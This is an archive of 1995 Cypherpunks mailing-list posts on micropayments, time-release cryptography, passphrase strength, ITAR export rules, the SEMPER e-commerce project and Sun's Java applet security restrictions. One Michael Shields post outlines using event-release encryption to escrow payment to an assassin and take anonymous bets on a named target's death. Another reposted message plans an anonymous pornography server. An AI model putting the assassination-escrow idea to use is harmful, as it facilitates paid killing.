they won't need to exist.  Instant payment at very low
prices collapses whole ranges of problems that no longer
need be addressed.

> a rather extraordinary new economy can replace this,
> that of voluntary payment. 

We have "voluntary payment" now in most transactions not
involving the government.

> you DISDAIN things like copyright, because they prevent
> your "product" from reaching the eyes of potential
> customers. your goal is actually to distribute the
> product as far as possible, in a sort of pyramid-like
> scheme. you want your "customers" to distribute your
> product to their friends, so that those "friends"
> potentially become customers in an endless cycle.

You don't actually collect anything, though.  I guess you 
make it up in volume, right?

> this approach works amazingly with writing. imagine that
> if John Markoff suddenly QUIT the NYT and just wrote
> articles on his own. and imagine that at the bottom, you
> see a message, "for more of the same, send .5c or more to
> markoff@liberated.com". I submit that in the future,
> Markoff will probably be able to make more money than he
> does at NYT, because he is eliminating the middleman. the
> newspaper company is primarily built as a *distribution*
> channel. suddenly he doesn't have to pay anything out of
> his own salary, so to speak, for distribution.
> distribution is *free*. he doesn't require anyone else
> to do it for him. he puts his article in an apropriate
> place on the net and it circulates like a VIRUS if it is
> well received. the more people that see the article, the
> more people that pay him money.

You've got *part* of an idea here, but it's mixed up with
another idea.  It is already common for people with
service or product to sell to offer "free" information in
the form of articles, papers, small utilities, demos that
may actually have some use, and occasionally, fully
functional products.  In the field of intellectual
property in the electronic age, the incremental cost of a
copy approaches zero, so there is no great investment in
doing this.  There is, however, always something larger
FOR SALE, something that is being promoted by the
favorable exposure.  What is being given away is not the
final product one hopes to sell -- it is a loss leader,
something that in the field of information costs precious
little to run off.

> in an information system, individual objects have no
> value. what has value is the FLOW of quality information.
> if Markoff continues to flow with that good information,
> people will continue to pay for it. they will perceive
> that "by paying him, the quality information flow from
> him to me continues or increases".

People as marketplace players do not think like that.

> this same idea works with software. you don't see
> software as an end product. you see it as something that
> is evolving over time. and whenever you send money to a
> company for software, in this new system the idea is that
> "I like this software, and I want to see it grow. here
> is my contribution to that".

People as marketplace players do not think like that.  

The way some of them *may* think is, "I like this product;
it will evolve; my payment for a $1 license today entitles
me to new versions for a year; so this is a Smart Move."
<click!>

Also: "I like this digest article.  I like the way this 
author thinks and expresses himself.  It's a no-brainer to 
pay 20 cents for a copy of his full newsletter."  <click!>

> another interesting area is that of patents, and I see
> this dissolving in the same way. a patent is like trying
> to put a lock on an idea. but gradually people will
> realize, only ideas that are implemented have any value.
> you can't profit and lock an idea at the same time.

"Lock" and "no value" are not how patent is generally
viewed.  Xerox, Polaroid, IBM, Dow, duPont, et al would be
amused at your view.

> *dissemination* of ideas is what leads to profit, not
> locking them up.

You first.  Dissemination of *something* leads to exposure, 
establishment of credibility, *reputation*, in a word.  
That, in turn, gets you in the door for actual sales, 
whether of yourself, your funding proposal, or your actual 
product or service.  *That*, in turn, *may* lead to 
profits, assuming you have a whole bunch of other ducks in 
a row and manage your business well.

> hence there will be an economic incentive to an inventor
> to give away his ideas for free, at first. 

Yep, yep, I'm sold, just show me where to dump all these 
great ideas so I can get rich, quick.

> in the old system, where one thinks of an idea as a
> "thing", this sounds preposterous. 

Uh, um, in a word, "Yes."

> but in a new culture where ideas are seen as things that
> need to be cultivated and grown to work, it will seem
> eminently sensible. the inventor is releasing his idea to
> the world, saying "I can expand on this idea, even turn
> it into a reality, if you send me money". 

It was late, right?  You'd been up for a long time, right?  
You were getting the aching-back, numb-fingered madrugada 
sillies, right?  You mailed this in the afternoon because 
you'd slept it off by then and forgotten what you'd written, 
right?

> other people can of course steal the idea, but
> there is no value in the idea itself: 

No, of course not!

> the value is in the development of it 

Which only the originator can do, of course.

> into evolved new states, or the intellectual expertise of
> the inventor.

Yeah, history really shows this to be an effective 
principle on which to peg the survival of inventors.

> in short, microcurrency could have quite a liberating
> and revolutionary effect on economics as we know it. 

Yep.  Liberating it clear away from planet Earth.  
Revolutionary, as in, "orbital."

> in the current system, people are not paid for tiny
> contributions to the whole. the contributions have to be
> "packaged up" into something like a magazine before
> individuals can get any profit. a new system may allow
> people to be compensated directly for things that are
> hard to quantify.

This *is* part of the point, V.  Physical manufacture and
distribution of printed magazines have inherent floor costs
and necessary economies of scale that are blown away in
electronic media on the Web.  Just plug in a way for quick 
and easy micropayment and the real revolution will be off 
and running.

>  how much was Markoff's last article worth in the NYT?
> that's impossible to figure out. but if you had a
> microcurrency, you can calculate exactly how much money
> people sent to Markoff for his last article. say, across
> the world, it totalled $843.16. such a sum is not
> inconceivable. and over time it would be enough for him
> to make a salary over the whole year on, perhaps!! I'm
> arguing that this is increasingly going to become VIABLE
> over the next few years with cyberspace and
> microcurrency.

Yes, but not with payment after the fact on the honor
system.  Sit down with *any* of the numerous vendors from
whom you presently buy living space, food, municipal
services, phone service, Internet access, car repairs,
etc., and try convincing them that you should get the
product first, and if you like it you will pay. Later. 
Right.

> the microcurrency situation can even be set up in a
> company. "whoever codes this computer problem will
> receive [x] dollars from the company". the whole economic
> system becomes a fluid, pulsing entity that filters down
> to the tiniest fraction of value and gives each
> individual a quantitative value on his contribution.
> companies talk about "incentive systems" today, but
> perhaps the entire economy will become an enormous
> incentive system in this way in the future!!

I believe this is called "The Free Market," and it has
little to do with any concept of "pay what you think it's
worth after you use it."  The Internet is exploding in
part because it is the *only* free market in the world,
though a market in tenuous and vaporous ideas and
information propagated for many reasons other than direct
pecuniary benefit.  A micropayment mechanism will allow
the net to mature into a fully functioning free market in
information and services of value on which many of the
participants will support themselves.  Many of those
products and services do not presently exist as such. 

"Companies" will be quite virtual and non-geocentric, and
will form and disband in the ether. Too, everyone's
low-cost opinion soapbox will sprout a 1-cent sign on it,
and the ones with something to say that others want to read
will make something on their expression of thoughts,
research, and other information while the ones no one cares
to pay for will wither or preach to themselves.

> in this system, ultimately, I think the whole concept
> that someone "buys a product" will dissolve into the
> idea that "one rewards intellectual productivity to bring
> more of the same". it's as fundamental and intuitive as
> the difference between atoms and bits. 

I disagree.  I believe you're right about the imminent
revolution that will take off when the micropayment
mechanism falls into place, and several of the
underpinnings you present in support of that view, but I
think you've misread what this is about and where it's
going.

The crypto relevance is that everything is in place for 
profound new growth in a new form of commerce, awaiting 
only an effective mechanism that will allow one to make a 
fraction-of-a-second decision and click on something to at 
once authorize a micropayment and navigate somewhere.  Web 
page designers will work out how to best use it and how to 
package the information it buys.  Storable 
pre-authorization tokens would be nice, so that one can 
make a decision that persists through subsequent accesses 
and only pops up for review if the price changes.  And it's 
got to be smooth enough for Grandma to use it.


 ------------ http://www.phoenix.net/~tjunker ------------
| Your freedom is on the auction block.  What do you bid? |
 ---------------------------------------------------------
Unofficial Wang VS Information Center




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: don@cs.byu.edu
Date: Sat, 11 Nov 95 02:31:17 PST
To: cypherpunks@toad.com
Subject: Noise and the Zen of making it go away
Message-ID: <199511111029.DAA00758@wero.byu.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

From: cpunk@remail.ecafe.org (ECafe Anonymous Remailer)
Subject: Win95 A Hacker's Net Dream
Windows 95 Is A Hacker's Dream Over The Internet

>Central, Hong Kong, Nov 9 (NB) -- Windows 95, combined
>with the Internet, could be a dream made in hacker
>heaven. From seasoned propeller heads Newsbytes has
>contacted, it looks like Windows 95 could be more of
>a security nightmare than was first thought.

[snip]

From: an407769@anon.penet.fi (jerry the golden retriever)
Reply-To: an407769@anon.penet.fi
Date: Sat, 11 Nov 1995 06:29:46 UTC

>Windows 95 Is A Hacker's Dream Over The Internet
>CENTRAL, HONG KONG, 1995 NOV 9 (NB) -- Windows 95, combined with the
>Internet, could be a dream made in hacker heaven. From seasoned propeller
>heads Newsbytes has contacted, it looks like Windows 95 could be more of a
>security nightmare than was first thought.

Gee, somebody not been reading the list lately?

I think it's true, the list has become the fast lane to dump junk into.

Re the idea of making cpunks subscriber only- that would solve a few
problems, and people could post anonymously if a seperate address were
rigged up ("security through obscurity") as a subscribed address that
throws away anything from cpunks and forwards everything else to cpunks.
The idea being, of course, that if you're not close enough to the action
to know what the current anon-routing address is, you should go away.

At least the bulk of the conspiracypunk stuff has gone away.

Don

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQB1AwUBMKR6icLa+QKZS485AQHiFQMAlil+qYChoLhIkqxjlTvSiZacgHPHAGOx
BnauPARLTrO/MelBq2/p4gLkiYGBN6Z4Ut5wy0kZVpkRlDcDPewnhOEMZHZMZAsM
JbI79tkVZrTGTRUmwBQ2GlKctYbayodC
=HQsn
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Anonymous.ReMailer@f21.n216.z1.fidonet.org (Anonymous ReMailer)
Date: Sat, 11 Nov 95 19:32:32 PST
To: cypherpunks@toad.com
Subject: [NOISE] The State will wither away?
Message-ID: <c8c_9511112201@nisc.fidonet.org>
MIME-Version: 1.0
Content-Type: text/plain



Dale Worley (worley@world.std.com):
>It has become fashionable these days to say "The government can't suppress
><whatever>", usually with the smug implication that the speaker is getting
>away with <whatever>, and thus is more studly than the government.  However,
>these people are almost always wrong.  The correct statement is "The
>government isn't willing to expend the effort to suppress <whatever>."
>Anyone who wishes to disprove this is invited to sell heroin in Singapore.
Hey Duncan Frisell! Any kind words for this guy AFA risk assessment?

=================================================
This message has been forwarded by an anonymous remailer.  It is not from
where it appears.  For more information, send a message to HELP at 1:216/21.

--- ReMail RML00.03




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: droelke@spirit.aud.alcatel.com (Daniel R. Oelke)
Date: Sat, 11 Nov 95 14:02:28 PST
To: ses@tipper.oit.unc.edu
Subject: Re: Who needs time vaults anyway?
Message-ID: <9511112202.AA06738@spirit.aud.alcatel.com>
MIME-Version: 1.0
Content-Type: text/plain


> 
> As for real time-release - how about just using conventional encryption, 
> and require it to be brute-forced?
> 
> Depending on how fine grained you want the release to be, you could also 
> take the inverse of Moore's law, work out how big a key you need to have 
> it unbreakable in less than the desired time, add in whatever fudge 
> factors you feel like based on how much it would be worth to the opponent 
> to get early access, then lock up the secret and throw away the key. 
> 

The problem here is that it is probablistic when they are 
going to be able to unlock it.  If the search space will take a
total of 10 years to exhaustively search, there is a 50% chance
that they will find the key within 5 years, 10% chance that it
will be found in 1 year, etc.  So, if you are lucky, it will
be found in about the time you want it to be.  If you aren't it
will be found in a few milli-seconds.

There is also the problem that your intended recipeient will
need to expend just as much work as your advesary to decrypt
the message.  This might not be a disadvantage in the case of 
a "broadcast" message, but otherwise it might be.

Good idea - but I would say not pratical....
Now, if we just had an objects between 1 and 10 light years away 
that you could bounce lasers off of...... ;-)

Dan
------------------------------------------------------------------
Dan Oelke                                  Alcatel Network Systems
droelke@aud.alcatel.com                             Richardson, TX





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sat, 11 Nov 95 18:15:21 PST
To: cypherpunks@toad.com
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <199511110843.AAA18344@infinity.c2.org>
Message-ID: <483l88$1f0@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199511111953.MAA26503@nagina.cs.colorado.edu>,
Bryce <wilcoxb@nagina.cs.colorado.edu> wrote:
> A single station could serve up multiple pieces.  It would only
> reveal the k piece if the querying agent can prove that he has the 
> k-1 piece.  Of course if the total number of stations is small then 
> the "physically move the pieces" trick might work.

But you're back to trusting an agent or device not to reveal a secret.
What have you gained?

The point about moving the elements of the message physically apart has
merit, though.  So the one-time pad of timerel, the ideally secure but
unworkable model, is to encrypt your message with an OTP, then securely
transport the pad and location to points that are $ct$ metres apart,
where $t$ is the length of time you want to keep your message secret.
You could do this with a reflector $ct/2$ metres away, assuming your
opponent and you are in the same location.

I suppose this could be useful for very short-term applications (for
reference, the diameter of the solar system is about 5.4 light-hours),
but like the OTP, its application is limited.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKVYPeyjYMb1RsVfAQFvnAP9H7KfW6pDxvHJF2lIucJyuHX8W2Adrxbd
X5rawyQctlAWwRcef6JIPxHcUuL6uznW7bMXrDQMIzDjQMQ/Rb9SdxKdncU0sNQ3
kEuoCKI0r7FJtRS5fSByB6TyQ9dCJJGVRed7P9KVzjP6bCk7Ri889SfNLBd583Kp
INOMxDJ0sDY=
=LtqD
-----END PGP SIGNATURE-----
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shields@tembel.org (Michael Shields)
Date: Sat, 11 Nov 95 18:25:29 PST
To: cypherpunks@toad.com
Subject: Re: Who needs time vaults anyway?
In-Reply-To: <v02120d05accab753260f@[199.0.65.105]>
Message-ID: <483lqg$1kt@yage.tembel.org>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <v02120d05accab753260f@[199.0.65.105]>,
Robert Hettinga <rah@shipwright.com> wrote:
> In the real world, there's a trustee/nominee of some sort who does this.
> What's that to keep that from happening on the net, just like our much
> maligned (guy's gotta make a living, fer chrissake!) assassination-payoff
> escrow agent...

Note that with event-release crypto, the houses could make a public key
available, with the secret key to be held until the death of Tom Target.
That key pair could be used by any of its anonymous buyers while the
crypto house remained ignorant not only of the content and authorship
of the messages, but even of the messages' existance -- nothing at all
to subpoena.  The same key could be used by Tom to encrypt his will, by
the assassin's employer to encrypt the payment, and by anyone to place
a bet on whether Tom will die within a certain period of time (by using
ecash that expires, like Digicash).

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMKVaheyjYMb1RsVfAQEf7wP+OBRVv0UaoO6TLOcCHkwnMF8fMBFc2X3P
8fNV+ICtgWZwp+Bso58h3ocbyx9ilNOhI5l67JG4Oio+84gAnGpWS392KuXu84un
ROpO5ityE0Vhb//ToreVdQVCMvvSsO9cNOQCtFN4v9z/H+YD9YlE0yjp9fTsa32M
th9WA86OmbM=
=V97C
-----END PGP SIGNATURE-----
-- 
Shields.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Joel McNamara <joelm@eskimo.com>
Date: Sun, 12 Nov 95 07:59:14 PST
To: cypherpunks@toad.com
Subject: SEMPER
Message-ID: <199511121558.HAA27914@mail.eskimo.com>
MIME-Version: 1.0
Content-Type: text/plain


And now for something completely different, a Euro-centric plan for Net
digital commerce.

Haven't had a chance to look at the URL yet, but obviously crypto-relevant...

Joel
----------
Development of Electronic Marketplace:
				   
				   
		      EUROPEAN COMMISSION FUNDS
		       FIRST OPEN SOLUTION FOR
		  SECURE COMMERCE OVER THE INTERNET
				   
			    PRESS RELEASE
                              

Zrich, November 2nd, 1995:

     Backed by the European Commission, a consortium of 20 partners
from European industry and academia has embarked on a research project
to develop the fundamentals for secure electronic commerce.
     The goal of the 9-million ECU (approx. 14 million CHF) project,
SEMPER (Secure Electronic Marketplace for Europe), is to provide the
first open and comprehensive solutions for secure commerce over the
Internet and other public information networks.


A wide range of businesses are rapidly moving to explore the huge
potential of networked information systems, especially with the
Internet-based WWW (World-wide Web). The Internet, which already
connects more than 3 million computers and a substantially larger
number of users, is growing at a breathtaking pace with thousands of
newcomers every day.

Although the Internet has its roots in academia and is still dominated
by free-of-charge information, dramatic changes are expected in the
near future. For instance, the WWW will be used for a wide variety of
electronic commerce such as on- line trade or delivery of advanced
multimedia information services. The evolution of broadband networks
and "information highways" will intensify this trend.

The need for secure transactions in this new business environment,
which involves networks available to the general public, has triggered
a number of related efforts.  These initial developments are based
almost exclusively in the US and most of them are limited to
proprietary, or otherwise closed solutions, involving only electronic
payment issues. In contrast, SEMPER is directed towards a
comprehensive solution for secure electronic commerce, considering
legal, commercial, social, and technical requirements as well as
different options for an electronic marketplace.

Consistent with its broader goals, the SEMPER project will be managed
by an interdisciplinary team of experts from the academic, industrial
and general business environment in Europe. The team includes
representatives of the social sciences, finance, retail, publishing,
as well as in information and telecommunication technology.

The first of the three one-year phases will address a coherent
security model and a generic, open security architecture for the
electronic marketplace. This architecture will be independent of
specific hardware, software, or network architectures. The most
fundamental electronic commerce services, such as secure offering,
order, payment and information delivery, will also be integrated in
the first phase.

Subsequent phases will concentrate on more advanced services. These
will include fair exchange of documents, credentials, advanced
document processing, notary services and multimedia-specific security
services, such as protection of intellectual property
rights. Multi-party security and protection of user's privacy will
receive prime attention. SEMPER will use and integrate existing
architectures, tools, and services where appropriate.

Early trials will be provided for WWW, and subsequent tests performed
on ATM-based broadband networks to demonstrate the broad applicability
of SEMPER's architecture and services.

The SEMPER project is part of the Advanced Communication Technologies
and Services (ACTS) research program established by the European
Commission Directorate General XIII for 1994-1998. ACTS is the
follow-on program for Research on Advanced Communications in Europe
(RACE) 1987- 1994. The project will establish a Special Interest Group
for Secure Electronic Commerce (SIGSEC) which will make results
available to all interested parties, including standardisation bodies,
and will co-ordinate related projects, in particular those funded by
the European Commission.

IBM's Zurich Research Laboratory will provide the technical leadership
for the SEMPER project, and IBM France will act as co-ordinator. The
other members of the consortium are Cryptomathic (DK), DigiCash (NL),
EUROCOM EXPERTISE (GR), Europay International (B), FOGRA
Forschungsgesellschaft Druck (D), GMD - German National Research
Center for Information Technology (D), IBM European Networking Center
(D), INTRACOM (GR), KPN Research (NL), Otto-Versand (D), r3 security
engineering (CH), SEPT (F), Stichting Mathematisch Centrum / CWI (NL),
University of Freiburg (D), University of Hildesheim (D). Banksys (B),
Banque Generale du Luxembourg (L) and Telekurs (CH) are associated
with SEMPER.

For more information please contact

     Matthias Schunter                    Philippe Delaoutre
     Universitaet Hildesheim              IBM France
     Mail: schunter@rz.uni-hildesheim.de  Mail: FRIBMSPK@IBM.COM
     Tel. + 49 5121 883 788               Tel. + 33 1 49 05 61 12
     Fax  + 49 5121 883 732               Fax  + 33 1 47 68 40 33

or see

     <http://semper.darmstadt.gmd.de/~semper>
or   <http://www.zurich.ibm.com/Technology/Security/extern/semper/>.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Date: Sun, 12 Nov 95 08:02:33 PST
To: cypherpunks@toad.com
Subject: Re: POTP Security
In-Reply-To: <4uigeD3w165w@left.webcasters.com>
Message-ID: <B3igeD4w165w@left.webcasters.com>
MIME-Version: 1.0
Content-Type: text/plain


Path: left!jgrubs
From: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Newsgroups: alt.security.pgp
Subject: Re: POTP Security
Message-ID: <4uigeD3w165w@left.webcasters.com>
Date: Sun, 12 Nov 95 09:17:02 EST
References: <70LDeD1w165w@left.webcasters.com>
Reply-To: jgrubs@left.webcasters.com (Jim Grubs (W8GRT))
Organization: WebCasters(tm)

jgrubs@left.webcasters.com (Jim Grubs (W8GRT)) writes:

> 
> What level of security does this cute, little puppy provide???
> 

Summary of e-mail responses >--> POOR TO NONE.

Thanks, everyone.



--
                               WebCasters(tm)
      James C. Grubs                             jgrubs@webcasters.com
      6817 Maplewood Avenue                         Tel.: 419-882-2697
      Sylvania, OH 43560                             Fax: 419-885-2814
        Internet consulting, HTML programming, Information brokering
                   http:://www.webcasters.com/webcasters/
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jaana Segerberg <spjapo@uta.fi>
Date: Sun, 12 Nov 95 09:47:46 PST
To: cypherpunks@toad.com
Subject: (no subject)
Message-ID: <199511121747.TAA16827@uta.fi>
MIME-Version: 1.0
Content-Type: text/plain



[Prev][Next][Index]

Pornography Server

----------------------------------------------------------------------------

   *  To: Cypherpunks Mailing List <cypherpunks@toad.com>
   *  Subject: Pornography Server
   *  From: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
   *  Date: Sun, 13 Feb 1994 12:23:28 -0600 (CST)

----------------------------------------------------------------------------

In response to the posting about setting up a pornography server (Sorry,
I'm afraid I deleted the specific message so I cannot remember who you
was :-).

That is certainly a way for people to get and use PGP and to get used the
remailers.  It would get a lot of heavy use as well.  Now, if there was a
way to batch mailings (so that if, say, six people ordered one item, it
would be sent as one letter to all six instead of six different letters,
with precedence set to bulk), that would help even more.

Now, there are also some practical considerations as well.  What
materials do you archive?  If you put up pictures (gif or jpeg), you will
be talking about tremendous amounts of traffic.  Once they are uuencoded,
even with compression, they can be huge.  If you limit yourself to things
such as stories and the like, you will have less traffic, but also less
use.

There is also the legal side of distributing pornography.   Interstate
transfer is naughty and with Al Gore's Information-Superhighway Patrol,
it will raise some very political issues (but, by using a decent blind
system, for all the patrol knows, the distributor might be in the
recipient's state).

Also, and this is really just an interface issue, scripts should be
developed that will automate the retrieval process (ie, build and submit
the mail message).  These would be similiar to the hop.mail or anon.mail
scripts, but would be custom to the pornography server.

For example:
        It begins with an input for the file to be retrieved.
        It will continue prompting for that until the person enters a
                null (or 'q' or something)
        It will then list (at least) one dozen remailers, and they can
                select one (or take a default, and randomize it.  Or perhaps
                randomize it through >1 remailer, although that decreases
                response time.).
        They will then have to PGP sign their mail message (so that the
                ordering software can verify the person placing the order.
                This is to cut down mail-spoofing to mail-bomb an enemy
                with porn.)
        Encrypt it for the appropriate parties
        Send it on its way.

The server can either reply immediately with the appropriate files, or it
can batch everything up for processing during low-traffic times (I
personally like the first, but dont' really care that much).  The mail is
then PGP encrypted back to the recipient (by getting the key from a key
server, or by having the orderee register their key before hand, with the
latter probably being easier, although it does leave a paper trail that
can be examined) and sent out with precedence set to 'bulk' so that
other stuff is more important on the mail links.

It should all be fairly accomplishable with a series of perl and sh
scripts on either end.  The real question is what to offer.

I'll talk more about this from an organizational stand-point if anyone is
interested.  I'm afriad that I'm really not that good a programmer (even
of simple shells) as my field of expertise is in management and other
administrative stuff (but obviously not spelling :-)

____        Robert A. Hayden          <=> hayden@krypton.mankato.msus.edu
\  /__          -=-=-=-=-             <=>          -=-=-=-=-
 \/  /   Finger for Geek Code Info    <=> In the United States, they
   \/  Finger for PGP 2.3a Public Key <=> first came for us in Colorado...
-=-=-=-=-=-=-=-
(GEEK CODE 1.0.1)  GAT d- -p+(---) c++(++++) l++ u++ e+/* m++(*)@ s-/++
                       n-(---) h+(*) f+ g+ w++ t++ r++ y+(*)

----------------------------------------------------------------------------

   * Prev: Re: A possible solution
   * Next: Pornography Server
   * Index: Cypherpunks







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Tue, 14 Nov 95 14:04:14 PST
To: Ted Cabeen <cypherpunks@toad.com
Subject: Re: Repeated Words/characters in Password/Phrase
Message-ID: <acce4e6b00021004573a@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 11:11 PM 11/14/95, Ted Cabeen wrote:
>Do repeated words in a PGP passphrase make the pass phrase less secure than
>a passphrase without any repeated words?  And on the same note, do repeated
>letters in a UNIX password make that password easier to break? I can't seem
>to find anything in my books on cryptography that mention this.  Thanks.

More of an information theory question than a crypto question. There are no
simple answers to this question, but some examples will help:

The password "foo" is not very good, and "foofoo" is only slightly better.
And "foofoofoo" is slightly better, and so on, to a point. But
"foofoo....foo" is not N times better than a single "foo," because the
_pattern_ is simply desribed: "repeat "foo" N times." Thus, the information
content or entropy of "foofoofoo....foo" is not N times greater than the
entropy of "foo."

A some dictionary attacks which would trivially find "foo" will not find
"foofoo," or "foofoofoo," etc., so this could be a great help. More
sophisticated dictionary attacks may of course take the 30,000 or so most
common names, words, places, and then do various permutations, reversals,
repetitions, etc.

So this is why there is not likely to be a simple answer to your question.
Repeating words in a passphrase can make the passphrase easier to remember
(such as "thequickquickbrownfox") and make certain kinds of attacks harder,
but with not as much of an increase in entropy at the increased number of
raw characters might otherwise suggest.

Other "heuristics" (simple rules of thumb) for passphrases are contained in
the PGP documents, and in numerous other places: avoid names, add
nonstandard English keyboard characters liberally (even if using real
words), etc. The "best" passphrases, it almost goes without saying, are the
longest and most "unpredictable," so that "7f#qp)djQ10hB%3t+1?U4SVp5" is
much superior to "%foo%foo".

In the real world, where passphrases must be memorized, "long and random"
is an elusive goal, which has to be weighed against the risk of other
attacks (such as capturing keystrokes with a sofware monitor, or from afar
with a van Eyk antenna, etc.).

Me, I use a nonsense phrase which has meaning to me, with a few garbage
characters added to confuse things further. I don't think my passphrase is
the weak link.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA              | knowledge, reputations, information markets,
Higher Power: 2^756839      | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Wed, 15 Nov 95 03:41:48 PST
To: jeffb@sware.com
Subject: Re: NSA, ITAR, NCSA and plug-in hooks.
In-Reply-To: <199511141758.MAA14695@jafar.sware.com>
Message-ID: <199511142016.VAA00818@trance.olari.clinet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>> For those who were wondering if plug-in crypto hooks were still watched 
>> out for. One wonders how the ietf folks are managing to promote internet-wide
>> standards that are considered unexportable (Are they? What's the deal on 
>> photuris, PEM, ipsec and the rest of them?)

> Does anyone know the ostensible justification for this?  What section of
> the ITARs do they point to when they say "this is illegal"?  I've perused
> an online copy of ITAR (no, I haven't read all of it -- I have other
> things I want to do this year :-), but I can't find a section that could
> be construed to support this contention.

Luckily, a lot of cryptographic materials are available outside the
United States (see e.g. http://www.cs.hut.fi/crypto for pointers).

If the United States chooses to restrict export of IP security
products, it simply helps create a flourishing network security
and other communications industry in other countries.  There are
already several implementations of the IP security stuff abroad -
including at least one in the former Soviet Union.

    Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Wed, 15 Nov 95 04:18:56 PST
To: cypherpunks@toad.com
Subject: Re: Netscape rewards are an insult
In-Reply-To: <199511151019.CAA18910@jobe.shell.portal.com>
Message-ID: <9511151215.AA20714@all.net>
MIME-Version: 1.0
Content-Type: text


> Alice here ...
...
> My post detailing a structural flaw in Netscape Navigator was announced,
> very quietly, to this list OVER ONE MONTH AGO.  And what has been done
> about it, by AT&T and/or Netscape??  Nothing. 
> 
> AT&T has its reputation attached to this code, as does Deutsche Telecom,
> as does Netscape.  The only "action" they've taken is to info-freeload and
> then do absolutely, positively, definitely ... nothing. 
> 
> Diddly-squat.
> 
> No one has taken any action whatsoever.

On a closely related vein, Sun has announced that they are severely
limiting some functions in HotJava - from Risks-17-45:

: The paper written by the two students at Princeton describes possible
: attacks on the alpha3 HotJava browser, which have all been fixed in JDK
: beta.  Granted, until this week, the source code for JDK beta wasn't
: available, so it's understandable that they analyzed the alpha3 source base.
: 
: We understand people need more information on the security model, and we're
: taking time right now to document the security story more rigorously.  A
: security FAQ, an updated whitepaper, detailed user documentation and
: detailed implementor's documentation are all being worked on.
: 
: ...
: 
: Access Control Lists are greatly restricted in beta,
:         as compared to the situation in the alpha3 HotJava browser. 
:         ACLs are initialized - only once - by the applet security
:         manager, and are not user configurable.
: 
:         For a file not on the access control list, an applet cannot
: 
:         - check for the existence of the file
:         - read the file 
:         - write the file 
:         - check the file type
:         - check if the file is a directory
:         - check the timestamp when the file was last modified
:         - check the file's size
:         - create a directory 
:         - rename the file
:         - list the files in this file (as if it were a directory)
: 
:         Applets cannot
: 
:         - create a FileInputStream 
:         - create a RandomAccessFile, either for reading or writing
:         - Open file descriptors
: 
:   2.  Sockets: 
: 
:         Applets cannot 
: 
:         - Create socket connections other than to its own host
:         - Create a socket factory
: 
:   3.  Loading/linking: 
: 
:         Applets cannot 
: 
:         - Create class loaders
:         - Access a package in the sun.* hierarchy
:         - Define a new class in the java.* hierarchy
:         - Link dynamic libraries using System.loadLibrary()
:         - Disable or override the AppletSecurityManager
: 
:   4.  Process control: 
: 
:         Applets cannot 
: 
:         - Define native methods
:         - Fork processes
:         - Manipulate threads or thread groups outside of the
:           applet's thread group
:         - Exit the virtual machine (e.g., the browser or the appletviewer)
: 
:   5.  awt: 
: 
:         Applets cannot
: 
:         - Create toplevel windows that don't have a warning banner
: 
: ...

I had a rather lengthy discussion with a gentleman from Sun at the CSI
conference last Tuesday night, and this announcement follows many of the
things we discussed very closely.  This kind of consistency between what
people say and what the company published is refreshing, and it restores
my faith in Sun's desire to do things well.  Of course there are still
some problems left unresolved:

:...
: It's very difficult, if not impossible, for a web browser to completely
: prevent denial of service attacks.  The JDK applet API doesn't claim to
: prevent denial of service attacks.  A "denial of service" attack is where
: someone writes an applet whose goal is to consume all available resources on
: your computer, forcing you to kill the browser you're running.  For example,
: someone could write an applet that creates a million pop-up windows.  The
: windows don't do anything, but creating a million of them might use up all
: the virtual memory on your computer and you'd have to kill the web browser
: to reclaim the virtual memory.
: 
: Before people engage in too much wailing and gnashing of teeth about
: how applets have been too severely restricted - 
: 
: We want to enable applets to do interesting things, including making
: socket connections, and reading and writing to the file system.  One
: way to enable that is to used a signed class loader.  When a trusted
: applet is loaded, then the applet could be granted permission to do
: some of the things they are prevented from doing by default.
: 
: The goal is to ensure that untrusted applets can't steal or damage
: information on a computer running a Java-enabled browser.  Later, we can
: allow trusted applets to do things that untrusted applets are not allowed to
: do.  Since an implementation bug in a trusted applet could open a loophole
: that could be exploited by an untrusted applet, design matters.
:...

Similarly, if your HotJava allows an insecure Postscript implementation
to interpret postscript files, you're still beat.

I do think that this response by Sun, regardless of the technical merits
of the particulars, demonstrates a desire to improve protection and a
willingness to listen.  My compliments for that.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Arley Carter <ac@hawk.twinds.com>
